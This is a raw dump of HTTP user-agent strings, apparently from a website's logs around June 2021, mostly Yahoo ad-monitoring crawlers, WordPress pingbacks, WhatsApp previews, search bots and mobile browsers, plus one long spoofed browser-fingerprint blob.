https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622558968-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622558966-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622579347-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622592843-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622601321-0 +WordPress/5.3.8; https://www.hemelix.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622647772-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 4.4.4; Micromax_Q4101 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622593977-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622602502-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622673192-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622595008-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622603898-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622606510-0 +WhatsApp/2.21.12.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622603975-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 4.4.2; A11w ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622679616-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622689117-0 +WordPress/5.7.2; https://nepcodex.com +WordPress/5.7.2; https://apisero.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.5.5; http://fotorest.ru +WhatsApp/2.21.10.13 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622723000-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622732680-10 +WordPress/5.7.2; https://zyto.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622683533-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622692428-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622711061-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622711118-0 +WhatsApp/2.21.12.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622749577-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622749649-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 8.0.0; SM-N900 ) U2/1.0.0 Mobile +WordPress/5.5.5; http://www.centr7pyadei.ru +{\x22window.screen\x22:{\x22mozLockOrientation\x22:{ toString : function () { return \x22function mozLockOrientation() { [native code]}\x22;}},\x22mozUnlockOrientation\x22:{ toString : function () { return \x22function mozUnlockOrientation() { [native code]}\x22;}},\x22availWidth\x22:414,\x22availHeight\x22:736,\x22width\x22:414,\x22height\x22:736,\x22colorDepth\x22:24,\x22pixelDepth\x22:24,\x22top\x22:0,\x22left\x22:0,\x22availTop\x22:0,\x22availLeft\x22:0,\x22mozOrientation\x22:\x22portrait-primary\x22,\x22onmozorientationchange\x22:null,\x22orientation\x22:{\x22lock\x22:[\x22\x22],\x22unlock\x22:[\x22\x22],\x22type\x22:\x22portrait-primary\x22,\x22angle\x22:0,\x22onchange\x22:null,\x22addEventListener\x22:[\x22\x22],\x22removeEventListener\x22:[\x22\x22],\x22dispatchEvent\x22:[\x22\x22],toString: function () {return \x22[object ScreenOrientation]\x22;}},\x22addEventListener\x22:{ toString : function () { return \x22function addEventListener() { [native code]}\x22;}},\x22removeEventListener\x22:{ toString : function () { return \x22function removeEventListener() { [native code]}\x22;}},\x22dispatchEvent\x22:{ toString : function () { return \x22function dispatchEvent() { [native code]}\x22;}}},\x22window\x22:{\x22mozInnerScreenX\x22:0.7666666507720947,\x22mozInnerScreenY\x22:30.766666412353516,\x22mozPaintCount\x22:0,\x22onmozfullscreenchange\x22:null,\x22onmozfullscreenerror\x22:null,\x22onmozpointerlockchange\x22:null,\x22onmozpointerlockerror\x22:null,\x22navigator\x22:{\x22getBattery\x22:{ toString : function () { return \x22function getBattery() { [native code]}\x22;}},\x22vibrate\x22:{ toString : function () { return \x22function vibrate() { [native code]}\x22;}},\x22javaEnabled\x22:function javaEnabled() {return true;},\x22getDeviceStorage\x22:{ toString : function () { return \x22function getDeviceStorage() { [native code]}\x22;}},\x22getDeviceStorages\x22:{ toString : function () { return \x22function getDeviceStorages() { [native code]}\x22;}},\x22getDeviceStorageByNameAndType\x22:{ toString : function () { return \x22function getDeviceStorageByNameAndType() { [native code]}\x22;}},\x22getGamepads\x22:{ toString : function () { return \x22function getGamepads() { [native code]}\x22;}},\x22sendBeacon\x22:{ toString : function () { return \x22function sendBeacon() { [native code]}\x22;}},\x22registerProtocolHandler\x22:{ toString : function () { return \x22function registerProtocolHandler() { [native code]}\x22;}},\x22registerContentHandler\x22:{ toString : function () { return \x22function registerContentHandler() { [native code]}\x22;}},\x22mimeTypes\x22:{ toString : function () { return \x22[object MimeTypeArray]\x22;}},\x22plugins\x22:{ toString : function () { return \x22[object PluginArray]\x22;}},\x22doNotTrack\x22:\x22unspecified\x22,\x22battery\x22:{\x22charging\x22:false,\x22chargingTime\x22:null,\x22dischargingTime\x22:5208,\x22level\x22:0.2,\x22onchargingchange\x22:null,\x22onchargingtimechange\x22:null,\x22ondischargingtimechange\x22:null,\x22onlevelchange\x22:null,\x22addEventListener\x22:[\x22\x22],\x22removeEventListener\x22:[\x22\x22],\x22dispatchEvent\x22:[\x22\x22],toString: function () {return \x22[object BatteryManager]\x22;}},\x22oscpu\x22:\x22Linux armv7l\x22,\x22vendor\x22:\x22\x22,\x22vendorSub\x22:\x22\x22,\x22productSub\x22:\x2220100101\x22,\x22cookieEnabled\x22:true,\x22buildID\x22:\x2220160726133114\x22,\x22deviceStorageAreaListener\x22:{\x22onstorageareachanged\x22:null,\x22addEventListener\x22:[\x22\x22],\x22removeEventListener\x22:[\x22\x22],\x22dispatchEvent\x22:[\x22\x22],toString: function () {return \x22[object DeviceStorageAreaListener]\x22;}},\x22mozNotification\x22:{\x22createNotification\x22:[\x22\x22],toString: function () {return \x22[object DesktopNotificationCenter]\x22;}},\x22connection\x22:{\x22type\x22:\x22wifi\x22,\x22ontypechange\x22:null,\x22addEventListener\x22:[\x22\x22],\x22removeEventListener\x22:[\x22\x22],\x22dispatchEvent\x22:[\x22\x22],toString: function () {return \x22[object NetworkInformation]\x22; +WordPress/5.7.2; https://www.routech.ro +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) adbeat.com/policy Gecko/20100101 Firefox/88.0 +WhatsApp/2.21.12.4 A +WhatsApp/2.21.12.7 A +WhatsApp/2.2121.5 N +WordPress/5.7.2; https://rucore.net/p +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622773691-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622842622-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622842625-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622768379-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622772472-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622773118-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622773120-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622776768-0 +WhatsApp/2.21.101.1 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622814568-0 +WordPress/5.7.2; https://b5.tuyulninja.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622790176-0 +Python-httplib2/0.19.1 (gzip) +WordPress/5.7.2; https://iotespresso.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622916293-0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) adbeat.com/policy Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622916294-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622916248-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622856339-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1622864301-0 +WordPress/5.7.2; https://getpricetoday.com +sogou +NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; Pt-BR; nokiac3-00) U2/1.0.0 UCBrowser/9.1.0.291 U2/1.0.0 Mobile UNTRUSTED/1.0 +okhttp/3.14.6 +WordPress/5.7.2; https://blossomthemes.com; verifying pingback from 52.202.15.149 +WordPress/5.4.6; http://julia-rubleva.ru +python-urllib3/1.26.5 +WordPress/5.5.5; http://h-itcn.com +WordPress/5.5.5; http://job-am.com +WordPress/5.5.5; http://bdautomatismos.com +WordPress/5.5.5; http://skrubs-etc.com +WordPress/5.5.5; http://tanambo.com +WordPress/5.5.5; http://menard-avocat.com +WordPress/5.7.2; https://blog.worldanvil.com; verifying pingback from 192.40.220.138 +Tiny Tiny RSS/21.02-1c7e4782a (http://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623016322-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1622974102-0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 7.0; SM-G600FY ) U2/1.0.0 Mobile +curl/7.18.2 +Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:88.0) adbeat.com/policy Gecko/20100101 Firefox/88.0 +yacybot (-global; amd64 Windows 10 10.0; java 1.8.0_291; America/en) http://yacy.net/bot.html +WordPress/5.6.3; https://sigmadigital.uk; verifying pingback from 192.40.220.138 +WordPress/5.7.2; https://culttture.com; verifying pingback from 192.40.220.138 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623041845-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623088922-10 +WordPress/5.7.2; http://gjstudija.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623026860-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623033955-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623049171-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623050469-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1623083754-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623093083-0 +WordPress/5.7.2; https://iniciarbr.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 6.0; GT-S5360 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 7.1.2; SM-J727T1 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://b9.tuyulninja.com +WordPress/5.7.2; https://caloginguide.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623111542-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623119821-0 +WordPress/5.7.2; https://foreignbanks.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623112258-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623113306-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623121403-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623152590-10 +WhatsApp/2.21.11.17 A +WhatsApp/2.21.7.13 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623180968-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623113808-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623122678-0 +WhatsApp/2.21.12.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623145069-0 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd-_dliH30czPWe8hFXyqRVq9qXZtg) +WhatsApp/2.2121.6 N +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36 PTST/210608.162047 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 PTST/210608.162047 +WordPress/5.7.2; https://b7.tuyulninja.com +Google Chrome/88.0.4324.192 Mac OS X +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623197616-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623207431-0 +Python-httplib2/0.12.3 (gzip) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623198466-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623208501-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623272592-10 +yacybot (/global; amd64 Linux 5.3.18-lp152.75-preempt; java 11.0.11; Europe/de) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623200936-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623211216-0 +WhatsApp/2.21.12.14 A +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/91.0.4472.90 Safari/537.36 +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/90.0.4430.97 Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36 PTST/210609.200427 +WordPress/5.7.2; https://legasioakheart.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623272185-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623272183-0 +Botbox TV/1.0 (Linux;Android BOUZ TV) ExoPlayerLib/2.11.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623284255-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623295424-0 +WordPress/5.7.2; https://www.dazeroawp.it +WhatsApp/2.21.110.15 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623330317-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623338887-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623285269-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623296486-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36 PTST/210609.200427 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623331119-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623339662-10 +WhatsApp/2.21.12.15 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623289136-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623299035-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623303620-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623318863-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623333393-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623341098-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 PTST/210609.200427 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36 PTST/210610.140319 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 PTST/210610.140319 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36 PTST/210610.140319 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/91.0.4472.90 Mobile Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 6.0.1; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.7.2; https://pragmatictheories.tech +WordPress/5.7.2; https://loghelper.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 8.1.0; DLI-TL20 ) U2/1.0.0 Mobile +yacybot (/global; amd64 Linux 4.15.0-144-generic; java 11.0.11; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) 2106 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623370574-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623378717-0 +WhatsApp/2.21.12.16 A +WordPress/5.7.2; https://blog.remitly.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623416813-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623416812-0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/607.1 (KHTML, like Gecko) JavaFX/8.0 Safari/607.1 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd_D6iGEVfWyU6tFD4KJax7Aaj8new) +Mozilla/5.0 (Windows NT 10.0; Win64; 